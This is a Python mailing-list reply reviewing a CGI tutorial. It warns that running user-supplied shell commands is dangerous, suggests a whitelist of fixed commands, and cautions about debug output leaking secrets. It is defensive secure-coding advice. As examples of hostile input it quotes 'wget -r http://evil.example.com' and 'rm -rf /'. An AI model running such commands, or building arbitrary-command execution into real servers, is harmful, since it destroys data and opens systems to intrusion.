CGI Tutorial
Tim Chase
python.list at tim.thechases.com
Wed Oct 4 16:24:18 EDT 2006
>> I'm just building a Python CGI Tutorial and would appreciate any
>> feedback from the many experts in this list.
>
> http://webpython.codepoint.net
Thanks! :)
My first note would be regarding
http://webpython.codepoint.net/shell_commands
The code is very dangerous...allowing any ol' schmoe to run
arbitrary code on your server. At the barest of minimums, I'd
plaster the code with warnings that this is a Very Dangerous
Thing(tm) to do. Preferably, one would want to have fixed sets
of commands, something like
install_django = 'curl...'
if command=='install_django': sub.Popen(install_django, ...)
so that only trusted code is run, not arbitrary things like
'wget -r http://evil.example.com'
or
'rm -rf /'
which would just be bad.
Similarly, regarding
http://webpython.codepoint.net/debugging
you might want to caution that this will/can display potentially
sensitive information (passwords, internal file-structure, etc),
and thus should only be used while debugging, and turned off in
any sort of production code.
The section on single vs. multiple field names was pretty good at
giving a nice overview that there are *two* scenarios one might
encounter.
Just a little feedback, whether from an expert or otherwise. :)
-tkc
More information about the Python-list
mailing list